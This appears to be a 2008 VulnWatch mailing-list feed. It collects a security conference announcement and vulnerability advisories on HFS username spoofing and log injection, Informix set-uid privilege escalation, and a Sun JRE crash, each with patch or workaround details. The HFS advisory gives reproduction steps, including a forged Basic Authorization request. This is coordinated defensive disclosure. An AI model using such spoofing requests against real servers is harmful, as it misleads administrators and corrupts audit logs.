
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@private for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

]]> Mon, 07 Jan 2008 16:09:53 -0500 iDefense Labs http://lists.jammed.com/vulnwatch/2008/02/0007.html There is a new security con coming up that I wanted to let people know
about. I am on the advisory committee and I will be speaking as part of
the L0pht reunion panel. The conference is Source Boston and it will be
occuring March 12-14 in Boston, Ma a few days before St. Patrick's Day.
So not only will there be great speakers but a Boston style pub crawl.

There is a great line up of speakers both from the technical side and the
business side so if you have any entrepreneurial inklings this should be
the perfect con for you.

Here is the schedule: http://www.sourceboston.com/sessions/

I hope to see you there!

-Chris

]]> Tue, 19 Feb 2008 10:57:35 -0500 (EST) Chris Wysopal http://lists.jammed.com/vulnwatch/2008/01/0009.html Syhunt: HFS (HTTP File Server) Username Spoofing and Log
Forging/Injection Vulnerability

Advisory-ID: 200801163
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 1.5g to and including 2.3(Beta Build
#174); and possibly HFS version 1.5f
Non-Affected Applications: HFS 1.5e and earlier versions
Class: Log Forging/Injection, Username Spoofing
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0407 - Username Spoofing Vulnerability
* CVE-2008-0408 - Log Forging / Injection Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
HFS versions 1.5g to 2.3 Beta (and possibly version 1.5f) are
vulnerable to log forging and username spoofing vulnerabilities.
Remote attackers can appear to be logged in with any desired
username or perform log injection in the log file and GUI panel.
Technical details are included below.

----------------------------------------------------------------

Details (Replicating the issues):
1) Log Forging / Injection Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
See the "maniplog" command

maniplog [localfilename]
This will inject the content of [localfilename] to the HFS log
panel and file.

2) Username Spoofing Vulnerability
a. Login at http://[host]/~login as [user_x]. Then request
(using a web browser): http://[user_y]:[anywrongpwd]@[host]/
--or--
b. send a direct request in the following format (does not
require previous login):
GET / HTTP/1.1
(...)
Authorization: Basic dXNlcl95

Both alternatives could make an admin to believe that user Y has
made the HTTP request when reviewing logs.

Additional Considerations:
* Vulnerabilities described here will not allow browsing
protected files and folders.

----------------------------------------------------------------

Vulnerability Status:
The author was contacted and HFS version 2.2c was released. The
new version can be downloaded at www.rejetto.com/hfs/download or
via the "Check for news/updates" option in the HFS menu.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta is only affected if the option "Accept any login
for unprotected resources" is enabled. This option, introduced
in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

]]> Wed, 23 Jan 2008 15:50:57 -0200 Alec Storm http://lists.jammed.com/vulnwatch/2008/02/0002.html iDefense Security Advisory 01.31.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 31, 2008

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. For more information, visit the product's homepage at the
following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a file creation vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

When the SQLIDEBUG environment variable is set, several set-uid binaries
will log debugging information to the specified file.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges.

After creating the file, the file's ownership is changed to match the
user and group of the executing user. As such, an attacker could create
files that they own anywhere on the system.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from all programs included with Informix will
prevent exploitation. However, this could disable some functionality
for non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability with the release of version
10.00.xC8 of Informix Dynamic Server. For more information, visit the
following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011556

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0369 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007 Initial vendor notification
09/13/2007 Initial vendor response
01/31/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@private for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

]]> Mon, 04 Feb 2008 14:48:20 -0500 iDefense Labs http://lists.jammed.com/vulnwatch/2008/01/0004.html -- Corsaire Security Advisory --

Title: Sun J2RE DoS issue
Date: 05.09.06
Application: Sun JRE 5.0 prior to update 14
Environment: Sun JRE
Author: Martin O'Neal [martin.oneal@private]
Audience: General distribution
Reference: c060905-002


-- Scope --

The aim of this document is to clearly define an issue that exists with
the Sun JRE product [1] that will allow an attacker to cause the JRE and
Internet Explorer to fail, possibly losing unsaved work etc.


-- History --

Discovered: 05.09.06 (Martin O'Neal)
Vendor notified: 09.11.06
Additional analysis: (Kevin O'Reilly)
Document released: 08.01.08


-- Overview --

Sun JRE is described [1] as "the Java APIs, Java Virtual Machine
(HotSpot VM), and other components necessary to run applets and
applications written in the Java programming language".

The software provides a virtualisation layer that allows java
applications to be run across platforms and operating systems. These
java applications can be delivered to the JVM via a number of
mechanisms, and are commonly downloaded from a web server or less
commonly, can be embedded within HTML content.


-- Analysis --

The RFC2397 [2] standard allows for the encoding of java applets within
a URI, allowing it to be embedded in an HTML document.

If an applet is encoded into the data parameter of an object tag with an
undefined "name" attribute, and is then passed to Internet Explorer,
then when the application is unencoded and passed in turn to the JVM it
causes a null pointer exception to occur in jpiexp32.dll.


-- Recommendations --

Upgrade to a version of the Sun JRE product that does not exhibit this
issue (such as Sun JRE 6.0 or JRE 5.0 update 14), and uninstall all
effected versions. This is important, as it is possible for an attacker
to specify which local VM will be used to run an applet (and so select a
vulnerable version).


-- CVE --

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-0012 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardises names for
security problems.


-- References --

[1] http://java.sun.com/javase/
[2] http://www.ietf.org/rfc/rfc2397

This bug is tracked by Sun as 6511363.


-- Revision --

a. Initial release.


-- Distribution --

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Corsaire
accepts no responsibility for any damage caused by the use or misuse of
this information.


-- Disclaimer --

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Corsaire
accepts no responsibility for any damage caused by the use or misuse of
this information.


-- About Corsaire --

Corsaire are a leading information security consultancy, founded in 1997
in Guildford, Surrey, UK. Corsaire bring innovation, integrity and
analytical rigour to every job, which means fast and dramatic security
performance improvements. Our services centre on the delivery of
information security planning, assessment, implementation, management
and vulnerability research.

A free guide to selecting a security assessment supplier is available at
http://www.penetration-testing.com


Copyright 2006 Corsaire Limited. All rights reserved.

]]> Tue, 8 Jan 2008 12:36:32 -0000 advisories http://lists.jammed.com/vulnwatch/2008/02/0003.html iDefense Security Advisory 01.31.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 31, 2008

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. For more information, visit the product's homepage at the
following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a file creation vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

The set-uid root "onedcu" command requires six parameters to be
specified when it is executed. The second parameter is a "Trace" file
that this program will open and write to with elevated privileges.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from the "onedcu" program included with
Informix will prevent exploitation. However, this could disable some
functionality for non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability with the release of version
10.00.xC8 of Informix Dynamic Server. For more information, visit the
following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011556

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0368 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007 Initial vendor notification
09/13/2007 Initial vendor response
01/31/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@private for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

]]> Mon, 04 Feb 2008 14:49:53 -0500 iDefense Labs